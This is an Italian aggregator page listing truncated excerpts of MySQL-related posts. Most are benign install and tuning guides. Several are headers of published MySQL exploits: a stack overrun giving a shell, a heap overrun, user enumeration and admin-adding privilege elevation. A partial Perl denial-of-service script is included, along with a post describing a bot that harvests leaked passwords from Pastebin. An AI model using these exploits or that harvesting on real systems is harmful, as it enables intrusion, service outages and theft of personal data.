Are you the publisher? Claim or contact us about this channel


Embed this content in your HTML

Search

Report adult content:

click to rate:

Account: (login)

More Channels


Channel Catalog


Channel Description:

Gnu Linux e tutto l'Opensource che cercavi

(Page 1) | 2 | 3 | 4 | newer

    0 0

    #!/usr/bin/perl =for comment   MySQL Server exploitable stack based overrun Ver 5.5.19-log for Linux and below (tested with Ver 5.1.53-log for suse-linux-gnu too) unprivileged user (any account (anonymous account?), post auth) as illustrated below the instruction pointer is overwritten with 0x41414141 bug found by Kingcope this will yield a shell as the user 'mysql' when [...]

    0 0

    # MySQL Heap Overrun # tested for the latest version of mysql server on a SuSE Linux system # # As seen below $edx and $edi are fully controlled, # the current instruction is # => 0x83a6b24 <free_root+180>: mov (%edx),%edi # this means we landed in a place where 4 bytes can be controlled by [...]

    0 0

    # MySQL User Account Enumeration Utility # When an attacker authenticates using an incorrect password # with the old authentication mechanism from mysql 4.x and below to a mysql 5.x server # the mysql server will respond with a different message than Access Denied, what makes # User Account Enumeration possible. # The Downside is [...]

    0 0

    use DBI();   $|=1;   =for comment   MySQL privilege elevation Exploit This exploit adds a new admin user. By Kingcope   Tested on * Debian Lenny (mysql-5.0.51a) * OpenSuSE 11.4 (5.1.53-log)   How it works: This exploit makes use of several things: *The attacker is in possession of a mysql user with 'file' privileges [...]

    0 0

    # MySQL User Account Enumeration Utility # When an attacker authenticates using an incorrect password # with the old authentication mechanism from mysql 4.x and below to a mysql 5.x server # the mysql server will respond with a different message than Access Denied, what makes # User Account Enumeration possible. # The Downside is [...]

    0 0

    5.5.19-log on SuSE Linux   DoS exploit: -------------------------------------------------------------------------------------------------------- use Net::MySQL; use Unicode::UTF8 qw[decode_utf8 encode_utf8];   $|=1;   my $mysql = Net::MySQL->new( hostname => '192.168.2.3', # Default use UNIX socket database => 'test', user => "monty", password => "python", debug => 1, );   $mysql->_execute_command("\x12", "\x00\x00\x00\x00 foo"); exit;   for ($k=0;$k<50000;$k++) { $a .="<A$k>"; } for [...]

    0 0

    SQLSentinel ha recentemente raggiunto la seconda versione beta, un software completamente sviluppato in Java in grado di individuare velocemente delle possibili falle di SQL Injection all’interno di un sito internet senza poi proseguire alla fase di exploiting. La versione 0.1 rilasciata i primi giorni di Aprile integra le seguenti funzionalità: Crawler web integrato che permette [...]

    L'articolo Rilasciata una nuova versione di SQLSentinel sembra essere il primo su Over Security.


    0 0

    Come prima cosa, occorre scaricare i seguenti package: Apache(web server): versione 1.3.33 MySQL(database): versione 4.1.12 PHP: 5.0.4 Una volta completato il download, occorre procedere con la decompressione dei pacchetti sovracitati: root@padrino:~# tar -zxvf apache_1.3.33.tar.gz -C /usr/local root@padrino:~# tar -zxvf mysql-max-4.1.12-pc-linux-gnu-i686.tar.gz -C /usr/local root@padrino:~# tar -zxvf php-5.0.4.tar.gz -C /usr/local (Tutti i file sono stati scompattati nella [...]

    0 0
  • 04/06/13--15:03: MySql
  • Questo testo ha lo scopo di descrivere il primo approccio al database MySql. Non contiene quindi una descrizione completa del linguaggio ma le sue parti ritenute essenziali. Come prerequisito è richiesta una conoscenza del linguaggio SQL cui si fa riferimento in svariati punti. Il manuale completo può essere scaricato dal sito www.mysql.com/documentation/ Gli esempi non [...]

    0 0
  • 04/12/13--03:09: [PHP] Pastebin Scraper
  • Su pastebin vengono postati giornalmente un sacco di password e dati sensibili. Proprio per questo ho deciso di creare un piccolo bot che mi salva tutti questi dati sensibili nel mio database. Per fare questo ho utilizzato php e due semplici classi che...

    0 0

    Nginx (si pronuncia "engin") è un server HTTP open-source ad alte prestazioni. Nginx è conosciuto per la sua stabilità, ricco set di funzionalità, configurazione semplice e per il basso consumo di risorse. Questo tutorial mostra come è possibile installare Nginx su un server di Debian 7 Wheezy con supporto PHP5 (attraverso PHP-FPM) e il supporto di MySQL. LEMP = (Linux + Nginx + MySQL + PHP).

    0 0

    Anche se il formato della tabella di MySQL è molto affidabile (tutte le modifiche a una tabella fatta da un’istruzione SQL sono scritti prima l’istruzione restituisce), è ancora possibile ottenere tabelle danneggiate se uno qualsiasi dei seguenti eventi:      Il processo mysqld viene fermato nel bel mezzo di una scrittura nel DB.      Un blocco [...]

    0 0

    source: http://www.securityfocus.com/bid/23911/info   MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain specially crafted queries.   An attacker can exploit this issue to crash the application, denying access to legitimate users.   NOTE: An attacker must be able to execute arbitrary SELECT statements against the database to exploit this issue. [...]

    0 0

    Salve, Dopo un lungo tempo rientro con un articolo molto interessante per chi vuole (o deve) aumentare le performance del proprio server Mysql: Per la mia personale esperienza consiglio di fare tali modifiche: Utilizzare MariaDB ( Un Fork molto performante di mysql ) Ottimizzare le tabelle Ottimizzare il vostro file di configurazione a seconda del […]

    L'articolo Aumentare le prestazioni di Mysql sembra essere il primo su Mirio Dev.


    0 0

    Se all'avvio del servizio mysql server si ottiene il seguente errore ... Another MySQL daemon already running with the same unix socket ... eseguire i seguenti comandi: mondounix.com # mv /var/lib/mysql/mysql.sock /var/lib/mysql/mysql.sock.bak &nbs...

    0 0

    Quando si realizza un sito web, sarebbe buona regola non mettere tutto subito online, ma sviluppare e testare tutto in locale, sul proprio pc, per poi passare online quando si è ragionevolmente certi che il sito sia abbastanza (per non … Continua a leggere

    L'articolo Sito web in locale su Linux senza XAMPP – Parte 1 sembra essere il primo su RedBlue's Blog.


    0 0
  • 02/28/14--13:02: Ubuntu sceglie MySQL
  • Oggi Mark Shuttleworth ha

    0 0

    Migrando una versione Joomla 1.5 alla 2.5 si potrebbe imbattere su un errore del genere “JTableMenu: _getNode Failed” quando si tenta di creare una voce di menù. Analizzando la tabella menu del database noteremo che manca id = 1 oppure semplicemente non è stato migrato. Per risolvere questo problema non dovremmo far altro che creare di …


    0 0

    Lunedì scorso la MariaDb Foundation ha annunciato tramite un post sul blog la … [Visita il sito per leggere tutto l'articolo]

    0 0

    Eseguire i comandi seguenti (le parti in grassetto devono essere sostituite con dei nomi da voi scelti)$ apt-get install apache2 php5 mysql-server php5-mysql$ mysql -u USERNAME_MYSQL_ADMIN -pEnter password:Welcome to the MySQL monitor.  ...

(Page 1) | 2 | 3 | 4 | newer